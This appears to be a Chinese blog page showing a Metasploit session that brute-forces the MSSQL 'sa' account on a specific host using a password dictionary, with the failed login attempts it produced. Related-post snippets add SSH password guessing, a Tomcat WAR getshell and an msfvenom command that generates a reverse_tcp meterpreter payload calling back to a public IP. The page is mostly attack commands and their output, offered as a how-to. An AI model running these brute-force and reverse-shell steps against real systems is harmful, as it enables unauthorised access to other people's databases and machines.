show options:

  1. msf auxiliary(scanner/mssql/mssql_login) > show options
  2.  
  3. Module options (auxiliary/scanner/mssql/mssql_login):
  4.  
  5.    Name                 Current Setting                           Required  Description
  6.    ----                 ---------------                           --------  -----------
  7.    BLANK_PASSWORDS      false                                     no        Try blank passwords for all users
  8.    BRUTEFORCE_SPEED     5                                         yes       How fast to bruteforce, from 0 to 5
  9.    DB_ALL_CREDS         false                                     no        Try each user/password couple stored in the current database
  10.    DB_ALL_PASS          false                                     no        Add all passwords in the current database to the list
  11.    DB_ALL_USERS         false                                     no        Add all users in the current database to the list
  12.    PASSWORD                                                       no        A specific password to authenticate with
  13.    PASS_FILE            /home/i3ekr/Desktop/dict/pass-top100.txt  no        File containing passwords, one per line
  14.    RHOSTS               10.40.21.28                               yes       The target address range or CIDR identifier
  15.    RPORT                1433                                      yes       The target port (TCP)
  16.    STOP_ON_SUCCESS      false                                     yes       Stop guessing when a credential works for a host
  17.    TDSENCRYPTION        false                                     yes       Use TLS/SSL for TDS data "Force Encryption"
  18.    THREADS              1                                         yes       The number of concurrent threads
  19.    USERNAME             sa                                        no        A specific username to authenticate as
  20.    USERPASS_FILE                                                  no        File containing users and passwords separated by space, one pair per line
  21.    USER_AS_PASS         false                                     no        Try the username as the password for all users
  22.    USER_FILE                                                      no        File containing usernames, one per line
  23.    USE_WINDOWS_AUTHENT  false                                     yes       Use windows authentification (requires DOMAIN option set)
  24.    VERBOSE              true                                      yes       Whether to print output for all attempts
  25.  
  26. msf auxiliary(scanner/mssql/mssql_login) > run 
  27.  
  28. [*] 10.40.21.28:1433      - 10.40.21.28:1433 - MSSQL - Starting authentication scanner.
  29. [!] 10.40.21.28:1433      - No active DB -- Credential data will not be saved!
  30. [-] 10.40.21.28:1433      - 10.40.21.28:1433 - LOGIN FAILED: WORKSTATION\sa:123456 (Incorrect: )
  31. [-] 10.40.21.28:1433      - 10.40.21.28:1433 - LOGIN FAILED: WORKSTATION\sa:npdx123 (Incorrect: )

MSF爆破MSSQL的更多相关文章

  1. msf爆破

    SSH服务口令猜解: msf > use auxiliary/scanner/ssh/ssh_loginmsf auxiliary(ssh_login) > show optionsmsf ...

  2. msf学习笔记

    metasploit frame 这是一个渗透测试框架,围绕这个框架,我们就可以完成最终的目标,即渗透测试. 渗透测试者困扰:需要掌握数百个工具,上千条命令参数,很难记住. 新出现的漏洞PoC/EXP ...

  3. kali linux之msf信息收集

    nmap扫描 Auxiliary 扫描模块 目前有557个扫描方式

  4. 第十七章 Metasploit Framework

    渗透测试者的困扰▪ 需要掌握数百个工具软件,上千个命令参数,实在记不住▪ 新出现的漏洞PoC/EXP有不同的运行环境要求,准备工作繁琐▪ 大部分时间都在学习使用不同工具的使用习惯,如果能统一就好了▪ ...

  5. Metasploit基础命令

    msf > show exploits 列Metasploip的所有可用的渗透测试框架.在MSF终端中可以针对渗透测试中发现的安全漏洞来实施相应的渗透攻击. msf > show auxi ...

  6. hashcat 密码破解工具 使用教程

    日期:2019-08-16 15:03:12 更新: 作者:Bay0net 介绍:记录一下 hashcat 的使用命令 0x01.Install Hashcat Wiki - FAQ Github - ...

  7. tomcat漏洞利用总结

    一.后台war包getshell 漏洞利用: tomcat在conf/tomcat-users.xml配置用户权限 <?xml version="1.0" encoding= ...

  8. msf各种弱口令爆破

    Msf: 写的很乱 记录下msf各个爆破弱口令的模块 run post/windows/gather/arp_scanner RHOSTS=10.10.10.0/24 使用arp_scanner模块 ...

  9. Msf的一些常用操作

    payload的几个常用生成 生成windows下的反弹木马 msfvenom -p windows/meterpreter/reverse_tcp LHOST=60.205.212.140 LPOR ...

随机推荐

  1. C# 反射与dynamic最佳组合

    在 C# 中反射技术应用广泛,至于什么是反射.........你如果不了解的话,请看下段说明,否则请跳过下段.广告一下:喜欢我文章的朋友请关注一下我的blog,这也有助于提高本人写作的动力. 反射:当 ...

  2. Oracle基础 表分区

    Oracle基础 表分区 一.表分区 (一)表分区的分类 1.范围分区(range) 2.散列分区(hash) 3.列表分区(list) 4.复合分区:范围-哈希(range-hash).范围-列表( ...

  3. [转]MATLAB cell数据类型

    细胞型数据类型(cell)使不同类型和不同维数的数组可以共存,细胞型数组实际上可以认为是一种以任意形式的数组为分量的多维数组. 1.细胞型数据的定义 1)直接赋值定义:细胞型变量在定义时需要使用大括号 ...

  4. 动态include是通过servlet进行页面信息交互的

    动态include是通过servlet进行页面信息交互的

  5. 2011 Multi-University Training Contest 7 - Host by ECNU

    AC: F I. rank 40/88. 开场看了F发现是个简单的DP,随便写了一下WA,,,发现把样例倒着输就过不了了...原来是忘了最后的时候开始上课的话可能上不了多久... 想到一个简洁的状态方 ...

  6. BZOJ3124 SDOI2013直径

    本以为必有高论,结果是个思博题.随便找一条直径,最后答案肯定是这条直径上的连续一段,如果某分支长度等于直径上某端的长度这一端都要被剪掉. #include<iostream> #inclu ...

  7. 转:关于Latent Dirichlet Allocation及Hierarchical LDA模型的必读文章和相关代码

    关于Latent Dirichlet Allocation及Hierarchical LDA模型的必读文章和相关代码 转: http://andyliuxs.iteye.com/blog/105174 ...

  8. [洛谷P2106]Sam数

    题目大意:问长度为$n$的$Sam$数有几个,$Sam$数的定义为没有前导零,相邻两个数字之差绝对值小于等于$2$的数 题解:发现转移方程一定,可以矩阵快速幂. 卡点:没有特判$n=1$的情况 C++ ...

  9. [SDOI2013]淘金 数位DP

    做了好久.... 大致思路: 求出前k大的方格之和即为答案, 先考虑一维的情况,设f[i]为数位上各个数相乘为i的数的总数,也就是对于数i,有f[i]个数它们各个位相乘为i, 再拓展到二维,根据乘法原 ...

  10. axios请求,拦截器的使用

    1. axios 创建请求 import axios from 'axios' import {Message} from 'element-ui' import router from " ...